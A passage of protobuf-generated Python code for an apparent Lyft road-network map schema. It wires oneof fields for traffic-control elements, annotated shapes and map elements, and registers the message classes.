_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'])
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.fields_by_name['segment'].message_type = _GLOBALID
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.fields_by_name['orientation'].enum_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.containing_type = _SEGMENTSEQUENCE
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION.containing_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION
_SEGMENTSEQUENCE.fields_by_name['type'].enum_type = _SEGMENTSEQUENCE_TYPE
_SEGMENTSEQUENCE.fields_by_name['segments'].message_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION
_SEGMENTSEQUENCE_TYPE.containing_type = _SEGMENTSEQUENCE
_LANESEQUENCE.fields_by_name['lanes'].message_type = _GLOBALID
_LANESEQUENCES.fields_by_name['lane_sequences'].message_type = _LANESEQUENCE
_POLYGON.fields_by_name['shell_vertices'].message_type = _GEOLOCATION
_POLYGON.fields_by_name['holes'].message_type = _POLYGON
_MULTIPOLYGON.fields_by_name['polygons'].message_type = _POLYGON
_ANNOTATEDSHAPE_BUILDING.fields_by_name['type'].enum_type = _ANNOTATEDSHAPE_BUILDING_TYPE
_ANNOTATEDSHAPE_BUILDING.containing_type = _ANNOTATEDSHAPE
_ANNOTATEDSHAPE_BUILDING_TYPE.containing_type = _ANNOTATEDSHAPE_BUILDING
_ANNOTATEDSHAPE_REGION.containing_type = _ANNOTATEDSHAPE
_ANNOTATEDSHAPE.fields_by_name['name'].message_type = _LOCALIZEDSTRING
_ANNOTATEDSHAPE.fields_by_name['multipolygon'].message_type = _MULTIPOLYGON
_ANNOTATEDSHAPE.fields_by_name['building'].message_type = _ANNOTATEDSHAPE_BUILDING
_ANNOTATEDSHAPE.fields_by_name['region'].message_type = _ANNOTATEDSHAPE_REGION
_ANNOTATEDSHAPE.fields_by_name['venue'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['park'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['building'])
_ANNOTATEDSHAPE.fields_by_name['building'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['region'])
_ANNOTATEDSHAPE.fields_by_name['region'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['venue'])
_ANNOTATEDSHAPE.fields_by_name['venue'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'])
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['park'])
_ANNOTATEDSHAPE.fields_by_name['park'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'])
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_LATLNGBOX.fields_by_name['south_west'].message_type = _GEOLOCATION
_LATLNGBOX.fields_by_name['north_east'].message_type = _GEOLOCATION
_MAPELEMENT_ELEMENT.fields_by_name['segment'].message_type = _ROADNETWORKSEGMENT
_MAPELEMENT_ELEMENT.fields_by_name['node'].message_type = _ROADNETWORKNODE
_MAPELEMENT_ELEMENT.fields_by_name['lane'].message_type = _LANE
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'].message_type = _TRAFFICCONTROLELEMENT
_MAPELEMENT_ELEMENT.fields_by_name['junction'].message_type = _JUNCTION
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'].message_type = _SEGMENTSEQUENCE
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'].message_type = _ANNOTATEDSHAPE
_MAPELEMENT_ELEMENT.containing_type = _MAPELEMENT
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['segment'])
_MAPELEMENT_ELEMENT.fields_by_name['segment'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['node'])
_MAPELEMENT_ELEMENT.fields_by_name['node'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['lane'])
_MAPELEMENT_ELEMENT.fields_by_name['lane'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'])
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['junction'])
_MAPELEMENT_ELEMENT.fields_by_name['junction'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'])
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'])
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ASSOCIATEDCONDITIONS.fields_by_name['conditions'].message_type = _CONDITION
_MAPELEMENT_ASSOCIATEDCONDITIONS.fields_by_name['overrides'].message_type = _MAPELEMENT_ELEMENT
_MAPELEMENT_ASSOCIATEDCONDITIONS.containing_type = _MAPELEMENT
_MAPELEMENT_DEBUGINFOENTRY.containing_type = _MAPELEMENT
_MAPELEMENT.fields_by_name['id'].message_type = _GLOBALID
_MAPELEMENT.fields_by_name['element'].message_type = _MAPELEMENT_ELEMENT
_MAPELEMENT.fields_by_name['bounding_box'].message_type = _LATLNGBOX
_MAPELEMENT.fields_by_name['associated_conditions'].message_type = _MAPELEMENT_ASSOCIATEDCONDITIONS
_MAPELEMENT.fields_by_name['debug_info'].message_type = _MAPELEMENT_DEBUGINFOENTRY
_MAPFRAGMENT.fields_by_name['elements'].message_type = _MAPELEMENT
DESCRIPTOR.message_types_by_name['GlobalId'] = _GLOBALID
DESCRIPTOR.message_types_by_name['GeoLocation'] = _GEOLOCATION
DESCRIPTOR.message_types_by_name['GeoFrame'] = _GEOFRAME
DESCRIPTOR.message_types_by_name['LocalizedString'] = _LOCALIZEDSTRING
DESCRIPTOR.message_types_by_name['RoadNetworkNode'] = _ROADNETWORKNODE
DESCRIPTOR.message_types_by_name['AccessRestriction'] = _ACCESSRESTRICTION
DESCRIPTOR.message_types_by_name['DailyTimeInterval'] = _DAILYTIMEINTERVAL
DESCRIPTOR.message_types_by_name['Schedule'] = _SCHEDULE
DESCRIPTOR.message_types_by_name['Condition'] = _CONDITION
DESCRIPTOR.message_types_by_name['RoadNetworkSegment'] = _ROADNETWORKSEGMENT
DESCRIPTOR.message_types_by_name['Junction'] = _JUNCTION
DESCRIPTOR.message_types_by_name['Lane'] = _LANE
DESCRIPTOR.message_types_by_name['TrafficControlElement'] = _TRAFFICCONTROLELEMENT
DESCRIPTOR.message_types_by_name['SegmentSequence'] = _SEGMENTSEQUENCE
DESCRIPTOR.message_types_by_name['LaneSequence'] = _LANESEQUENCE
DESCRIPTOR.message_types_by_name['LaneSequences'] = _LANESEQUENCES
DESCRIPTOR.message_types_by_name['Polygon'] = _POLYGON
DESCRIPTOR.message_types_by_name['MultiPolygon'] = _MULTIPOLYGON
DESCRIPTOR.message_types_by_name['AnnotatedShape'] = _ANNOTATEDSHAPE
DESCRIPTOR.message_types_by_name['LatLngBox'] = _LATLNGBOX
DESCRIPTOR.message_types_by_name['MapElement'] = _MAPELEMENT
DESCRIPTOR.message_types_by_name['MapFragment'] = _MAPFRAGMENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GlobalId = _reflection.GeneratedProtocolMessageType('GlobalId', (_message.Message,), {
'DESCRIPTOR' : _GLOBALID,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GlobalId)
})
_sym_db.RegisterMessage(GlobalId)
GeoLocation = _reflection.GeneratedProtocolMessageType('GeoLocation', (_message.Message,), {
'DESCRIPTOR' : _GEOLOCATION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GeoLocation)
})
_sym_db.RegisterMessage(GeoLocation)
GeoFrame = _reflection.GeneratedProtocolMessageType('GeoFrame', (_message.Message,), {
'DESCRIPTOR' : _GEOFRAME,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GeoFrame)
})
_sym_db.RegisterMessage(GeoFrame)
LocalizedString = _reflection.GeneratedProtocolMessageType('LocalizedString', (_message.Message,), {
'DESCRIPTOR' : _LOCALIZEDSTRING,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LocalizedString)
})
_sym_db.RegisterMessage(LocalizedString)
RoadNetworkNode = _reflection.GeneratedProtocolMessageType('RoadNetworkNode', (_message.Message,), {
'DESCRIPTOR' : _ROADNETWORKNODE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkNode)
})
_sym_db.RegisterMessage(RoadNetworkNode)
AccessRestriction = _reflection.GeneratedProtocolMessageType('AccessRestriction', (_message.Message,), {
'DESCRIPTOR' : _ACCESSRESTRICTION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AccessRestriction)
})
_sym_db.RegisterMessage(AccessRestriction)
DailyTimeInterval = _reflection.GeneratedProtocolMessageType('DailyTimeInterval', (_message.Message,), {
'DESCRIPTOR' : _DAILYTIMEINTERVAL,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.DailyTimeInterval)
})
_sym_db.RegisterMessage(DailyTimeInterval)
Schedule = _reflection.GeneratedProtocolMessageType('Schedule', (_message.Message,), {
'DESCRIPTOR' : _SCHEDULE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Schedule)
})
_sym_db.RegisterMessage(Schedule)
Condition = _reflection.GeneratedProtocolMessageType('Condition', (_message.Message,), {
'DESCRIPTOR' : _CONDITION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Condition)
})
_sym_db.RegisterMessage(Condition)
RoadNetworkSegment = _reflection.GeneratedProtocolMessageType('RoadNetworkSegment', (_message.Message,), {
'LaneSet' : _reflection.GeneratedProtocolMessageType('LaneSet', (_message.Message,), {
'DESCRIPTOR' : _ROADNETWORKSEGMENT_LANESET,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkSegment.LaneSet)
})
,
'DESCRIPTOR' : _ROADNETWORKSEGMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkSegment)
})
_sym_db.RegisterMessage(RoadNetworkSegment)
_sym_db.RegisterMessage(RoadNetworkSegment.LaneSet)
Junction = _reflection.GeneratedProtocolMessageType('Junction', (_message.Message,), {
'DESCRIPTOR' : _JUNCTION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Junction)
})
_sym_db.RegisterMessage(Junction)
Lane = _reflection.GeneratedProtocolMessageType('Lane', (_message.Message,), {
'Boundary' : _reflection.GeneratedProtocolMessageType('Boundary', (_message.Message,), {
'DESCRIPTOR' : _LANE_BOUNDARY,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Lane.Boundary)
})
,
'DESCRIPTOR' : _LANE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Lane)
})
_sym_db.RegisterMessage(Lane)
_sym_db.RegisterMessage(Lane.Boundary)
TrafficControlElement = _reflection.GeneratedProtocolMessageType('TrafficControlElement', (_message.Message,), {
'PedestrianCrosswalk' : _reflection.GeneratedProtocolMessageType('PedestrianCrosswalk', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk)
})
,
'AuxiliaryElement' : _reflection.GeneratedProtocolMessageType('AuxiliaryElement', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.AuxiliaryElement)
})
,
'TrafficLightFaceState' : _reflection.GeneratedProtocolMessageType('TrafficLightFaceState', (_message.Message,), {
'YieldSet' : _reflection.GeneratedProtocolMessageType('YieldSet', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet)
})
,
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLightFaceState)
})
,
'TrafficLight' : _reflection.GeneratedProtocolMessageType('TrafficLight', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLight)
})
,
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement)
})
_sym_db.RegisterMessage(TrafficControlElement)
_sym_db.RegisterMessage(TrafficControlElement.PedestrianCrosswalk)
_sym_db.RegisterMessage(TrafficControlElement.AuxiliaryElement)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLightFaceState)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLightFaceState.YieldSet)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLight)
SegmentSequence = _reflection.GeneratedProtocolMessageType('SegmentSequence', (_message.Message,), {
'SegmentWithOrientation' : _reflection.GeneratedProtocolMessageType('SegmentWithOrientation', (_message.Message,), {
'DESCRIPTOR' : _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.SegmentSequence.SegmentWithOrientation)
})
,
'DESCRIPTOR' : _SEGMENTSEQUENCE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.SegmentSequence)
})
_sym_db.RegisterMessage(SegmentSequence)
